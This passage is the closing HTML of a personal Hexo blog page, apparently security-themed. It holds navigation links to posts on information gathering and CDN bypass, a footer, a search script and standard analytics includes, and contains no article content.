            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/04/06/xin-xi-shou-ji/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.jpg" class="responsive-img" alt="信息收集">
                        
                        <span class="card-title">信息收集</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-04-06
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Vcpeng
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/04/06/cdn-rao-guo/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/15.jpg" class="responsive-img" alt="cdn绕过">
                        
                        <span class="card-title">cdn绕过</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-04-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Vcpeng
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">Vcpeng</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1181062873@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1181062873" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1181062873" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
